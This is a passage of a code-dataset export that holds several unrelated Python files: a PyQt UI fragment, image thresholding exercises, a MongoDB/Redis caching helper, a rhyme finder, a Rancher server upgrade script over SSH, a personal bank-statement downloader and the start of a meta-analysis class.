BedAlarm.setGeometry(QtCore.QRect(0, 20, 101, 20))\n BedAlarm.setObjectName(\"BedAlarm\" + str(self._bedid))\n BedAlarm.setText(QtCore.QCoreApplication.translate(\"MainWindow\", \"Alarm\"))\n #create checkbox to indicate critical alarms\n BedCritAlarm = QtWidgets.QCheckBox(BedGroupBox)\n BedCritAlarm.setGeometry(QtCore.QRect(0, 40, 101, 20))\n BedCritAlarm.setObjectName(\"BedCritAlarm\" + str(self._bedid))\n BedCritAlarm.setText(QtCore.QCoreApplication.translate(\"MainWindow\", \"CritAlarm\"))\n #create button to add a module to a bed TODO: wire up a method for it.\n BedAddModule = QtWidgets.QPushButton(BedGroupBox)\n BedAddModule.setGeometry(QtCore.QRect(0, 60, 101, 32))\n BedAddModule.setObjectName(\"BedAddModule\" + str(self._bedid))\n BedAddModule.setText(QtCore.QCoreApplication.translate(\"MainWindow\", \"Add Module\"))\n #call children into view\n for module in self._modules:\n verticalLayout_2.addWidget(module.UI(verticalLayoutWidget))\n # resize after adding children\n heights = sum(\n x.frameGeometry().height() for x in iter(\n verticalLayoutWidget.findChildren(QtWidgets.QGroupBox, QtCore.QRegExp(\"ModuleGroupBox.*\")) # must regex out only the Module groupboxes otherwise it's comically oversized\n )\n ) # ugly as sin generator to sum heights of children\n if heights > 0:\n verticalLayoutWidget.setFixedHeight(heights)\n BedGroupBox.setFixedHeight(heights + 25)\n else:\n verticalLayoutWidget.setFixedHeight(75)\n BedGroupBox.setFixedHeight(100)\n return BedGroupBox\n","sub_path":"src/bed.py","file_name":"bed.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"369226645","text":"# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n# import cv2\nfrom scipy import ndimage\n\n\ndef show(_img, _title=None):\n plt.figure()\n plt.suptitle(_title)\n plt.imshow(_img, cmap='gray')\n plt.show()\n\n\ndef g(_img, _thresh, Z_E, Z_B):\n N = _img.shape[0]\n M = _img.shape[1]\n res = np.zeros((N, M))\n for i in range(N):\n for j in range(M):\n if _img[i][j] >= _thresh:\n res[i][j] = Z_E\n else:\n res[i][j] = Z_B\n return res\n\n# 类间方差\n\n\ndef mu(p):\n s = 0\n for i in range(len(p)):\n s += i * p[i]\n return s\n\n\ndef sigma(p, mu):\n s = 0\n for i in range(len(p)):\n s += (i - mu) ** 2 * p[i]\n return s\n\n\ndef eta(t, p):\n w0 = np.sum(p[:t])\n w1 = 1 - w0\n mu0 = mu(p[:t]) / w0\n muT = mu(p)\n mu1 = (muT - mu0) / w1\n var_w = sigma(p[:t], mu0) + sigma(p[t:], mu1)\n var_B = w0 * w1 * (mu1 - mu0) ** 2\n return var_B / (var_B + var_w)\n\n\ndef ostu(_img):\n N = _img.shape[0]\n M = _img.shape[1]\n freq = np.zeros((256, 1))\n for i in range(N):\n for j in range(M):\n freq[_img[i][j]] += 1\n freq /= (N * M)\n _eta = np.zeros(freq.shape)\n for t in range(1, 256):\n _eta[t] = eta(t, freq)\n return np.argmax(_eta)\n\n\nimg = np.array(Image.open('C:\\\\Users\\\\29388\\\\Pictures\\\\dip.png'))[:, :, 0]\nshow(img, 'original')\n# %%\n# median filter\n# img_blur = cv2.medianBlur(img, 3)\nimg_blur = ndimage.median_filter(img, 3)\nshow(img_blur, 'blur')\n# %%\n# test with t=128\nres = g(img_blur, 128, 256, 0)\nshow(res, 'test')\n# %%\nt_ostu = ostu(img_blur)\nres_ostu = g(img_blur, t_ostu, 256, 0)\nshow(res_ostu, 'ostu')\n# %%\n# erosion\nimg_eroded = ndimage.grey_erosion(img, 1)\nshow(img_eroded, 'erosion r = 1')\nshow(g(img_eroded, 128, 256, 0), 'test_erosion r = 1')\nshow(g(img_eroded, ostu(img_eroded), 256, 0), 'ostu_erosion r = 1')\nimg_eroded = ndimage.grey_erosion(img, 3)\nshow(img_eroded, 'erosion r = 3')\nshow(g(img_eroded, 128, 256, 0), 'test_erosion r = 3')\nshow(g(img_eroded, ostu(img_eroded), 256, 0), 'ostu_erosion r = 3')\nimg_eroded = ndimage.grey_erosion(img, 5)\nshow(img_eroded, 'erosion r = 5')\nshow(g(img_eroded, 128, 256, 0), 'test_erosion r = 5')\nshow(g(img_eroded, ostu(img_eroded), 256, 0), 'ostu_erosion r = 5')\n# %%\nimg_dilated = ndimage.grey_dilation(img, 1)\nshow(img_dilated, 'dilatation r = 1')\nshow(g(img_dilated, 128, 256, 0), 'test_dilatation r = 1')\nshow(g(img_dilated, ostu(img_dilated), 256, 0), 'ostu_dilatation r = 1')\nimg_dilated = ndimage.grey_dilation(img, 3)\nshow(img_dilated, 'dilatation r = 3')\nshow(g(img_dilated, 128, 256, 0), 'test_dilatation r = 3')\nshow(g(img_dilated, ostu(img_dilated), 256, 0), 'ostu_dilatation r = 3')\nimg_dilated = ndimage.grey_dilation(img, 5)\nshow(img_dilated, 'dilatation r = 5')\nshow(g(img_dilated, 128, 256, 0), 'test_dilatation r = 5')\nshow(g(img_dilated, ostu(img_dilated), 256, 0), 'ostu_dilatation r = 5')\n","sub_path":"Python/DIP/dip3.py","file_name":"dip3.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"237218571","text":"import re\r\nimport datetime\r\nimport configparser\r\nimport redis\r\nimport pickle\r\nimport pymongo\r\nfrom bson.objectid import ObjectId\r\nfrom serializer import MappedClassJSONEncoder\r\nfrom connection import create_db_connection\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('C://Users//Zerbs//accounts.sec')\r\ntime_prefix = \"timemong\"\r\n\r\nredis_key_delimiter = \"_\"\r\nclient = create_db_connection(config[\"mongo\"][\"login\"], config[\"mongo\"][\"password\"], config[\"mongo\"][\"path\"])\r\n\r\nredis_connection = redis.StrictRedis(host=config['redis']['host'], port=int(config['redis']['port']), db=0)\r\n\r\ndef write_time_to_redis(key):\r\n global time_prefix\r\n global redis_key_delimiter\r\n str_key = str(key)\r\n if (str_key[:2] == \"b'\"):\r\n str_key = str_key[2:-1]\r\n print(str_key)\r\n redis_connection.set(time_prefix + redis_key_delimiter + str_key, pickle.dumps(datetime.datetime.now()))\r\n\r\ndef get_date(string_date):\r\n if (isinstance(string_date,datetime.datetime)):\r\n return string_date\r\n return datetime.datetime.strptime(string_date, '%d.%m.%Y')\r\n\r\ndef get_date_time(string_date):\r\n if (isinstance(string_date,datetime.datetime)):\r\n return string_date\r\n return datetime.datetime.strptime(string_date, '%d.%m.%Y %H:%M')\r\n\r\ndef get(value):\r\n return value\r\n\r\ndef get_list(value):\r\n return value.replace(\" \",\"\").split(\",\")\r\n\r\ndef get_float(value):\r\n if value == None:\r\n return None\r\n return float(value)\r\n\r\ndef get_worker_date_state_list(value):\r\n #value = '12.12.2017,e88 ; 12.11.2017, e89 '\r\n print(\">>>>\" + value)\r\n result = []\r\n pre_result = value.replace(\" \",\"\").split(\";\")\r\n for item in pre_result:\r\n pair = item.split(\",\")\r\n result.append([get_date(pair[0]), pair[1]])\r\n return result\r\n\r\ndef get_holdings_list(value):\r\n #value = 'e88, 100 ;e89, 200 '\r\n print(\">>>>\" + value)\r\n result = []\r\n pre_result = value.replace(\" \",\"\").split(\";\")\r\n for item in pre_result:\r\n pair = item.split(\",\")\r\n result.append([pair[0], get_float(pair[1])])\r\n return result\r\n\r\n\r\n##\r\ndef find_next_flag(begin_index, command):\r\n print(command)\r\n for i in range(begin_index, len(command)):\r\n if (command[i][0] == \"-\") and (re.match(\"[a-z/-]\",command[i][1])):\r\n print(\"---%s\" % command[i])\r\n return i\r\n return len(command)\r\n\r\ndef get_parameter_cmd(command, code):\r\n try:\r\n index = command.index(code) + 1\r\n value = command[index]\r\n if (value[0] != \"-\") or (re.match(\"[0-9]\",value[1])):\r\n return command[index : find_next_flag(index + 1, command)]\r\n return None\r\n except ValueError:\r\n return None\r\n\r\ndef get_params(result, shorts):\r\n returned = []\r\n for short in shorts:\r\n returned.append(get_joined_value(result, short, \" \"))\r\n return returned\r\n\r\ndef parse(command, parameters_list):\r\n result = []\r\n for parameter in parameters_list:\r\n values = get_parameter_cmd(command, parameter)\r\n if values != None:\r\n result.append([parameter, values])\r\n return result\r\n\r\ndef get_stre(widths):\r\n stre = \"\"\r\n for width in widths:\r\n stre += \"%-\"+str(width)+\"s \"\r\n return stre\r\n\r\ndef get_joined_value(parameters, code, delimiter):\r\n for parameter in parameters:\r\n if code == parameter[0]:\r\n return delimiter.join(parameter[1])\r\n\r\ndef get_full_set(base_class):\r\n return base_class.query.find().all()\r\n\r\ndef get_ids_set(base_class, field_names, field_modifiers, params):\r\n\r\n #client = pymongo.MongoClient('mongodb://%s:%s@%s' % (config[\"mongo\"][\"login\"],\r\n # config[\"mongo\"][\"password\"],\r\n # config[\"mongo\"][\"path\"]))\r\n\r\n db = client.barbershopdb\r\n\r\n args = {}\r\n for i in range(len(field_names)):\r\n if (params[i] != None):\r\n if i == 0:\r\n args[field_names[i]] = params[i]\r\n else:\r\n args[field_names[i]] = field_modifiers[i](params[i])\r\n\r\n return [str(item[\"_id\"]) for item in db[str(base_class).split(\"'\")[1].split(\".\")[0]].find(args, {\"_id\":1})][5:]\r\n #print(base_class.query.get(**args))\r\n #return [str(item._id) for item in base_class.query.find(args).all()]\r\n\r\n #return base_class.query.find().all()\r\n\r\ndef get_properties_tuple(item, field_widths, field_names):\r\n result = []\r\n for i in range(len(field_widths)):\r\n if len(str(getattr(item, field_names[i]))) > field_widths[i]:\r\n result.append(str(getattr(item, field_names[i]))[:field_widths[i]-5] + \"...\")\r\n else:\r\n result.append(str(getattr(item, field_names[i])))\r\n return tuple(result)\r\n\r\ndef get_full_properties_tuple(item, field_names):\r\n result = []\r\n for i in range(len(field_names)):\r\n result.append(str(getattr(item, field_names[i])))\r\n return tuple(result)\r\n\r\ndef get_object(field_names, field_values, field_modifiers, base_class):\r\n args = {}\r\n for i in range(len(field_names)):\r\n args[field_names[i]] = field_modifiers[i](field_values[i])\r\n return base_class.query.get(_id = ObjectId(field_values[0]))\r\n #return base_class(**args)\r\n\r\ndef get_entities(command, base_class, field_shorts, field_names, field_modifiers):\r\n global redis_connection\r\n\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n\r\n full_set = []\r\n result = parse(command, field_shorts)\r\n ids = []\r\n params = get_params(result, field_shorts)\r\n redis_key = collection_name + redis_key_delimiter + redis_key_delimiter.join([str(param) for param in params])\r\n get_ids_set(base_class, field_names, field_modifiers, params)\r\n got_from_redis = redis_connection.get(redis_key)\r\n\r\n if (got_from_redis != None):\r\n result = [];\r\n print(\"got from redis\")\r\n unpacked = pickle.loads(got_from_redis)\r\n else:\r\n unpacked = get_ids_set(base_class, field_names, field_modifiers, params)\r\n print(unpacked)\r\n redis_connection.set(redis_key, pickle.dumps(unpacked))\r\n write_time_to_redis(redis_key)\r\n pipe = redis_connection.pipeline()\r\n item_keys = []\r\n for item_id in unpacked:\r\n item_key = collection_name + redis_key_delimiter + item_id\r\n item_keys.append(item_key)\r\n pipe.get(item_key)\r\n write_time_to_redis(item_key)\r\n item_params_set = pipe.execute()\r\n for i in range(len(unpacked)):\r\n if (item_params_set[i] != None):\r\n new_objectss = get_object(field_names, pickle.loads(item_params_set[i]), field_modifiers, base_class)\r\n full_set.append(new_objectss)\r\n else:\r\n right_item = base_class.query.get(_id = ObjectId(unpacked[i]))\r\n full_set.append(right_item)\r\n redis_connection.set(item_keys[i], pickle.dumps(get_full_properties_tuple(right_item, field_names)))\r\n write_time_to_redis(item_keys[i])\r\n #print([str(item,\"utf-8\") for item in pipe.execute()])\r\n return full_set\r\n\r\ndef show_entities(command, base_class, field_shorts, field_names, field_widths, field_modifiers):\r\n stre = get_stre(field_widths)\r\n print(stre % field_names)\r\n for item in get_entities(command, base_class, field_shorts, field_names, field_modifiers):\r\n print(stre % get_properties_tuple(item, field_widths, field_names))\r\n\r\ndef mark_redis_invalid(base_class):\r\n global redis_connection\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n for key in redis_connection.scan_iter(collection_name+\"*\"):\r\n print(key)\r\n redis_connection.delete(key)\r\n\r\n##\r\n\r\ndef check_universal(params):\r\n for param in params:\r\n if param != \"None\":\r\n return False\r\n return True\r\n\r\ndef revise_redis_keys_update(redis_keys, modified_key_params_before, modified_key_params_after, item_id):\r\n for key in redis_keys:\r\n current_key_params = str(key)[1:-1].split(redis_key_delimiter)[1:]\r\n #print(current_key_params)\r\n #print(modified_key_params_before)\r\n #print(modified_key_params_after)\r\n contained = True\r\n for i in range(len(modified_key_params_before)):\r\n if (current_key_params[i+1] != \"None\") and (current_key_params[i+1] != modified_key_params_before[i]):\r\n contained = False\r\n break\r\n\r\n contains = True\r\n for i in range(len(modified_key_params_after)):\r\n if (current_key_params[i+1] != \"None\") and (current_key_params[i+1] != modified_key_params_after[i]):\r\n contains = False\r\n break\r\n\r\n if contained and not contains:\r\n old_list = pickle.loads(redis_connection.get(key))\r\n #print(key,\" +++ \",old_list,\" --- \",item_id)\r\n old_list.remove(item_id)\r\n redis_connection.set(key, pickle.dumps(old_list))\r\n write_time_to_redis(key)\r\n elif not contained and contains:\r\n redis_connection.set(key, pickle.dumps(pickle.loads(redis_connection.get(key)) + [item_id]))\r\n write_time_to_redis(key)\r\n\r\n\r\ndef mark_redis_invalid_after_update_enhanced(base_class, modified_key_params_before_set, modified_key_params_after_set, identifiers, collection_name, field_names):\r\n global redis_connection\r\n global prefix\r\n\r\n\r\n #print(modified_key_params_after_set)\r\n for i in range(len(modified_key_params_after_set)):\r\n redis_keys = redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\")\r\n #print(\"revise for \",identifiers[i])\r\n revise_redis_keys_update(redis_keys, modified_key_params_before_set[i], modified_key_params_after_set[i], identifiers[i])\r\n\r\ndef mark_redis_invalid_after_update(base_class, modified_key_params, entities, collection_name, field_names):\r\n global redis_connection\r\n global prefix\r\n\r\n if not check_universal(modified_key_params):\r\n item_keys = []\r\n pipe = redis_connection.pipeline()\r\n for item in entities:\r\n item_id = get_properties_tuple(item, [10 for i in range(len(field_names))], field_names)[0]\r\n item_key = collection_name + redis_key_delimiter + item_id\r\n item_keys.append(item_key)\r\n pipe.get(item_key)\r\n write_time_to_redis(item_key)\r\n\r\n item_params_set = pipe.execute()\r\n for i in range(len(entities)):\r\n if (item_params_set != None):\r\n redis_connection.set(item_keys[i], pickle.dumps(get_full_properties_tuple(entities[i], field_names)))\r\n write_time_to_redis(item_keys[i])\r\n #redis_connection.delete(item_key)\r\n\r\n for key in redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\"):\r\n current_key_params = str(key)[2:-1].split(redis_key_delimiter)[1:]\r\n #if check_universal(current_key_params) and not check_universal(modified_key_params):\r\n # redis_connection.delete(key)\r\n # continue\r\n for i in range(len(modified_key_params)):\r\n if (modified_key_params[i] != \"None\") and (current_key_params[i+1] != \"None\"):\r\n redis_connection.delete(key)\r\n break\r\n\r\ndef revise_redis_keys(redis_keys, modified_key_params, append, item_id):\r\n for key in redis_keys:\r\n current_key_params = str(key)[1:-1].split(redis_key_delimiter)[1:]\r\n #if check_universal(current_key_params):\r\n # redis_connection.delete(key)\r\n # continue\r\n broken = False\r\n for i in range(len(modified_key_params)):\r\n if (current_key_params[i+1] != \"None\") and (current_key_params[i+1] != modified_key_params[i]):\r\n broken = True\r\n break\r\n if not broken:\r\n if append:\r\n redis_connection.set(key, pickle.dumps(pickle.loads(redis_connection.get(key)) + [item_id]))\r\n write_time_to_redis(key)\r\n else:\r\n old_list = pickle.loads(redis_connection.get(key))\r\n old_list.remove(item_id)\r\n redis_connection.set(key, pickle.dumps(old_list))\r\n write_time_to_redis(key)\r\n #redis_connection.delete(key)\r\n\r\ndef mark_redis_invalid_after_create(base_class, modified_key_params, collection_name, field_names, item_id):\r\n global redis_connection\r\n global prefix\r\n\r\n redis_keys = redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\")\r\n revise_redis_keys(redis_keys, modified_key_params, True, item_id)\r\n\r\ndef mark_redis_invalid_after_delete(base_class, deleted_items, collection_name, field_names):\r\n global redis_connection\r\n global prefix\r\n\r\n for item in deleted_items:\r\n redis_keys = redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\")\r\n redis_connection.delete(collection_name + redis_key_delimiter + str(item._id))\r\n modified_key_params = get_full_properties_tuple(item, field_names)[1:]\r\n revise_redis_keys(redis_keys, modified_key_params, False, str(item._id))\r\n\r\n##\r\n\r\ndef delete(command, base_class, field_shorts, field_names, field_modifiers, session):\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n entities = get_entities(command, base_class, field_shorts, field_names, field_modifiers)\r\n for item in entities:\r\n item.delete()\r\n session.flush_all()\r\n mark_redis_invalid_after_delete(base_class, entities, collection_name, field_names)\r\n #mark_redis_invalid(base_class)\r\n\r\ndef update(command, base_class, field_shorts, field_names, field_modifiers, session):\r\n entities = get_entities(command, base_class, field_shorts, field_names, field_modifiers)\r\n result = parse(command, [\"-\"+field_short for field_short in field_shorts[1:]])\r\n params = get_params(result,[\"-\"+field_short for field_short in field_shorts[1:]])\r\n\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n modified_key_params_before_set = []\r\n modified_key_params_after_set = []\r\n identifiers = []\r\n\r\n for item in entities:\r\n modified_key_params_before_set.append(get_full_properties_tuple(item, field_names)[1:])\r\n\r\n for i in range(len(params)):\r\n if (params[i] != None):\r\n for item in entities:\r\n setattr(item, field_names[i + 1], field_modifiers[ i + 1 ](params[i]))\r\n\r\n session.flush_all()\r\n\r\n for item in entities:\r\n identifiers.append(str(item._id))\r\n modified_key_params_after_set.append(get_full_properties_tuple(item, field_names)[1:])\r\n\r\n\r\n if not check_universal([str(param) for param in params]):\r\n item_keys = []\r\n pipe = redis_connection.pipeline()\r\n for item in entities:\r\n item_id = get_full_properties_tuple(item, field_names)[0]\r\n item_key = collection_name + redis_key_delimiter + item_id\r\n item_keys.append(item_key)\r\n pipe.get(item_key)\r\n write_time_to_redis(item_key)\r\n item_params_set = pipe.execute()\r\n for i in range(len(entities)):\r\n if (item_params_set != None):\r\n redis_connection.set(item_keys[i], pickle.dumps(get_full_properties_tuple(entities[i], field_names)))\r\n write_time_to_redis(item_keys[i])\r\n\r\n mark_redis_invalid_after_update_enhanced(base_class, modified_key_params_before_set, modified_key_params_after_set, identifiers, collection_name, field_names)\r\n #mark_redis_invalid(base_class)\r\n\r\ndef create(command, base_class, field_shorts, field_names, field_modifiers, session):\r\n result = parse(command, field_shorts)\r\n args = {}\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n params = []\r\n\r\n for i in range(len(field_names) - 1):\r\n params.append(str(get_joined_value(result, field_shorts[ i + 1], \" \")))\r\n if field_modifiers[ i + 1](get_joined_value(result, field_shorts[ i + 1], \" \")) == None:\r\n continue;\r\n args[field_names[i + 1]] = field_modifiers[ i + 1](get_joined_value(result, field_shorts[ i + 1], \" \"))\r\n\r\n new_object = base_class(**args)\r\n session.flush_all()\r\n\r\n item_key = collection_name + redis_key_delimiter + str(new_object._id)\r\n redis_connection.set(item_key, pickle.dumps(get_full_properties_tuple(new_object, field_names)))\r\n\r\n mark_redis_invalid_after_create(base_class, params, collection_name, field_names, str(new_object._id))\r\n return new_object\r\n\r\n##\r\n\r\ndef get_create_rules(cmd, field_status, field_shorts, field_names, field_descriptions):\r\n for i in range(len(field_status)):\r\n if field_status[i] == 1:\r\n opening_brace = \" [ \"\r\n closing_brace = \" ] \"\r\n elif field_status[i] == 2:\r\n opening_brace = \" \"\r\n closing_brace = \" \"\r\n else:\r\n continue\r\n cmd += opening_brace + field_shorts[i] + \" \" + field_names[i] + \" \" + field_descriptions[i] + closing_brace\r\n return cmd\r\n\r\ndef get_read_delete_rules(cmd, field_status, field_shorts, field_names, field_descriptions):\r\n for i in range(len(field_status)):\r\n cmd += \" [ \" + field_shorts[i] + \" \" + field_names[i] + \" \" + field_descriptions[i] + \" ] \"\r\n return cmd\r\n\r\ndef get_update_rules(cmd, field_status, field_shorts, field_names, field_descriptions):\r\n for i in range(len(field_status)):\r\n if field_status[i] == 0:\r\n continue\r\n cmd += \" [ \" + field_shorts[i] + \" \" + field_names[i] + \" \" + field_descriptions[i] + \" ] \"\r\n cmd += \" [ \" + \"-\" + field_shorts[i] + \" \" + field_names[i] + \" \" + \"new value\" + \" ] \"\r\n return cmd\r\n","sub_path":"python_mongo_crud/api/commons_.py","file_name":"commons_.py","file_ext":"py","file_size_in_byte":17729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"614123060","text":"import nltk\r\nimport nltk.corpus\r\n\r\n\r\ndef findrhyme(phones):\r\n for i in phones:\r\n if phones[-i][-1] in '12':\r\n return phones[-i:]\r\n\r\nentries = nltk.corpus.cmudict.entries()\r\nrhymedict = {}\r\nfor word, pron in entries:\r\n rhyme = (findrhyme(pron),)\r\n if rhyme in rhymedict:\r\n rhymedict[rhyme].add(word)\r\n else:\r\n rhymedict[rhyme] = {word}\r\n\r\ndef searchrhyme(word):\r\n if word in rhymedict.keys():\r\n wrdrhyme = findrhyme(nltk.corpus.cmudict.dict[word])\r\n rhymelist = rhymedict[wrdrhyme] - word\r\n print(word + \" rhymes with:\\n\")\r\n print(str(i) for i in rhymelist)\r\n else:\r\n print(word + \" is not in the dictionary. Sorry!\")\r\n\r\nif __name__ == \"__main__\":\r\n searchrhyme('fire')","sub_path":"findrhymes.py","file_name":"findrhymes.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"215136038","text":"import argparse\nimport requests\nimport time\nimport paramiko\nimport os\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', help='target version')\n parser.add_argument('-s', help='server node')\n parser.add_argument('-u', help='ssh username of rancher server host')\n parser.add_argument('-i', help='ssh key path', default=\"~/.ssh/id_rsa\")\n parser.add_argument('-o', help='timeout duration for rancher server to be ready', default=90)\n args = parser.parse_args()\n logger.info(args)\n logger.setLevel(logging.INFO)\n upgrade(args.t, args.s, args.u, args.i, args.o)\n\ndef upgrade(target, servernode, username, keypath, timeout):\n\n logger.info(\"UPGRADING RANCHER SERVER TO TARGET\")\n\n i = 1\n #\n # Try to connect to the host.\n # Retry a few times if it fails.\n #\n while True:\n logger.info(\"Trying to connect to %s (%i/30)\", servernode, i)\n try:\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n privatekeyfile = os.path.expanduser(keypath)\n mykey = paramiko.RSAKey.from_private_key_file(privatekeyfile)\n ssh.connect(servernode, username=username, pkey=mykey)\n logger.info(\"Connected to %s\", servernode)\n break\n except paramiko.AuthenticationException:\n logger.info(\"Authentication failed when connecting to %s\",\n servernode)\n sys.exit(1)\n except:\n logger.info(\"Could not SSH to %s, waiting for it to start\",\n servernode)\n i += 1\n time.sleep(2)\n\n # If we could not connect within time limit\n if i == 30:\n logger.info(\"Could not connect to %s. Giving up. \"\n \"Please check private key file.\", servernode)\n ssh.close()\n sys.exit(1)\n try:\n cmd = \"sudo docker ps\"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker stop $(sudo docker ps -q | awk '{print $1}')\"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n server_container_id = stdout.readlines()[0].strip(\"\\n\")\n logger.info(server_container_id)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker ps -a | awk ' NR>1 {print $2}' | cut -d \\: -f 2\"\n\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n tag_of_previous_rancher_server = stdout.readlines()[0].strip(\"\\n\")\n logger.info(\"tag_of_previous_rancher_server is: %s,\",\n tag_of_previous_rancher_server)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker create --volumes-from \" + server_container_id + \\\n \" --name rancher-data rancher/server:\" \\\n + tag_of_previous_rancher_server\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker pull rancher/server:\" + target\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker run -d --volumes-from rancher-data \" \\\n \"--restart=always -p 8080:8080 rancher/server:\" + target\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker ps | awk ' NR>1 {print $2}' | cut -d \\: -f 2\"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n tag_of_rancher_version_after_upgrade = \\\n stdout.readlines()[0].strip(\"\\n\")\n logger.info(\"tag_of_rancher_version_after_upgrade is: %s\",\n tag_of_rancher_version_after_upgrade)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker ps | awk ' NR>1 {print $8}' \"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n state_of_rancher_server_container_after_upgrade = \\\n stdout.readlines()[0].strip(\"\\n\")\n logger.info(\"state_of_rancher_server_container_after_upgrade is: %s\",\n state_of_rancher_server_container_after_upgrade)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n time.sleep(int(timeout))\n\n if tag_of_rancher_version_after_upgrade == target and \\\n state_of_rancher_server_container_after_upgrade == \"Up\":\n server = 'http://' + servernode + \":8080\"\n if requests.get(server).status_code == 200:\n logger.info(\n \"UPGRADE RANCHER SERVER TO TARGET COMPLETE AND SUCCESSFUL\")\n\n ssh.close()\n\nif __name__ == '__main__':\n logging.info(\"Starting upgrade tool...\")\n main()\n","sub_path":"tests/v2_validation/upgrade/upgrade_rancher_server.py","file_name":"upgrade_rancher_server.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"594573786","text":"import time\nfrom splinter import Browser\n\nimport constants\nimport fileUtils\n\n\ndef get_bill_number():\n profile = fileUtils.getBroswerProfile()\n with Browser(profile_preferences=profile) as browser:\n browser.visit('https://service.mbna.ca/waw/mbna/logon')\n browser.find_by_id('usernameInput').fill(constants.MBNA_ACCOUNT)\n browser.find_by_id('passwordInput').fill(constants.MBNA_PASSWORD)\n browser.find_by_id('login').click()\n if False:\n question = browser.find_by_id('MFAChallengeForm:question').value\n browser.find_by_id('MFAChallengeForm:answer').fill(constants.get_answer(question))\n browser.find_by_id('MFAChallengeForm:validateButton').click()\n time.sleep(5)\n browser.find_by_id('shortcuts0').find_by_tag('input').last.click()\n browser.find_by_tag('span').find_by_text('Statements').click()\n\n infos = browser.find_by_xpath('''//div[@class='td-layout-column td-layout-grid2 td-copy-align-right td-margin-none td-layout-column-last']''')\n\n value = infos[0].value\n datelinkvalue = infos[1].value\n # datelinkvalue = datelinkvalue.replace(' ', '')\n datelinkvalue = datelinkvalue.split('/')\n datelinkvalue = [datelinkvalue[2], datelinkvalue[0], datelinkvalue[1]]\n datelinkvalue = fileUtils.seperate_with(datelinkvalue)\n browser.find_by_text('Save current statement (pdf) ').click()\n time.sleep(5)\n fileUtils.renameFile('MBNA_'+datelinkvalue+'.pdf')\n return value\n\nif __name__ == '__main__':\n print('MBNA bill: ', get_bill_number())\n\n\n\n\n","sub_path":"grapMBNAbill.py","file_name":"grapMBNAbill.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"187612137","text":"from __future__ import absolute_import\r\nfrom __future__ import print_function\r\nimport numpy as np\r\nimport scipy.stats as st\r\nimport fastlmm.util.mingrid as mingrid\r\nfrom six.moves import range\r\n\r\n\r\nclass MetaAnalysis(object):\r\n \r\n def __init__(self, beta, ste, tau=0):\r\n self.beta = beta\r\n self.ste = ste\r\n self.tau = tau\r\n \r\n def var_beta(self):\r\n var = self.ste * self.ste + self.tau\r\n return var\r\n\r\n def inverse_variance_weights(self):\r\n return 1.0 / self.var_beta()\r\n\r\n def z_score(self):\r\n z_score = self.mean_beta() / self.ste_mean()\r\n return z_score\r\n\r\n def meta_pvalue(self):\r\n z_score = self.z_score() \r\n chi2 = z_score * z_score\r\n return st.chi2.sf(chi2, 1)\r\n\r\n def mean_beta(self):\r\n weights = self.inverse_variance_weights()\r\n mean_beta = self.beta.dot(weights) / (weights).sum()\r\n return mean_beta\r\n \r\n def ste_mean(self):\r\n return 1.0 / np.sqrt(self.inverse_variance_weights().sum())\r\n\r\n def log_likelihood(self, tau=None, mean_beta=None, reml=False):\r\n \r\n if 